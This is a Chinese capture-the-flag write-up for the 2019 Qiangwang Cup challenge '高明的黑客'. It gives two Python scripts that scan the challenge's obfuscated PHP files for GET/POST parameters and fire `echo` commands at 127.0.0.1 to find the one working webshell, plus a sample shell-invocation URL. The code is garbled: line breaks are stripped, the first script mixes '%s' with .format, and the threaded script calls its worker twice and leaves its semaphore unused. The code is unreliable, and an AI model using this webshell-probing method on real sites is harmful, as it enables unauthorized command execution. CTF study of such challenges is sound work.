D盾扫一堆混淆+shell,不过没有几个是能用的,需要跑个脚本,考察脚本编写能力的,测试一下哪个是能用的。
上py
import osimport requests# 文件路径path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"# 遍历文件目录查找文件files = os.listdir(path=path)# GET方法传参def GET(filename):f = open(path + filename, 'r')getList = []content = f.readlines()for line in content:if line.find("$_GET['") > 0:startIndex = line.find("$_GET['") + 7endIndex = line.find("'", startIndex)getList.append(line[startIndex:endIndex])return getList# POST方法传参def POST(filename):f = open(path + filename, 'r')postList = []content = f.readlines()for line in content:if line.find("$_POST['") > 0:startIndex = line.find("$_POST['") + 8endIndex = line.find("'", startIndex)postList.append(line[startIndex:endIndex])return postListif __name__ == "__main__":for file in files:if file != ".idea":print("OPEN FILE:" + file)get = GET(file)for i in get:url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"')response = requests.get(url=url)if response.text.find("GET SUCCESS") > 0:print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i))exit(0)post = POST(file)for i in post:url = "http://127.0.0.1/%s".format(file)data = {i: 'echo "POST SUCCESS"'}response = requests.get(url=url, data=data)if response.text.find("POST SUCCESS") > 0:print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i))exit(0)print("CLOSE FILE")贼捞,大概一分钟跑七到八个这样子,算了算根本跑不完。
还是要多线程,最后参考大佬脚本搞的。
/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27import osimport requestsimport threadingimport timeimport sys# 文件路径path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"# 遍历文件目录查找文件files = os.listdir(path=path)# GET方法传参def GET(filename):f = open(path + filename, 'r')getList = []content = f.readlines()for line in content:if line.find("$_GET['") > 0:startIndex = line.find("$_GET['") + 7endIndex = line.find("'", startIndex)getList.append(line[startIndex:endIndex])return getList# POST方法传参def POST(filename):f = open(path + filename, 'r')postList = []content = f.readlines()for line in content:if line.find("$_POST['") > 0:startIndex = line.find("$_POST['") + 8endIndex = line.find("'", startIndex)postList.append(line[startIndex:endIndex])return postListdef get_content(file):print("OPEN FILE:" + file)get = GET(file)for i in get:url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET ' 'SUCCESS"')response = requests.get(url=url)if response.text.find("GET SUCCESS") > 0:print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))f = open("shell.txt", "w")f.write(response.text)sys.exit(0)post = POST(file)for i in post:url = "http://127.0.0.1/src/{}".format(file)data = {i: 'echo "POST SUCCESS"'}response = requests.get(url=url, data=data)if response.text.find("POST SUCCESS") > 0:print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))f = open("shell.txt", "w")f.write(response.text)sys.exit(0)response.close()print("CLOSE FILE")if __name__ == "__main__":s1 = threading.Semaphore(100)requests.adapters.DEFAULT_RETRIES = 5for file in files:get_content(file)t = threading.Thread(target=get_content, args=(file,))t.start()Previous2019 强网杯Next随便注Last updated 2 years ago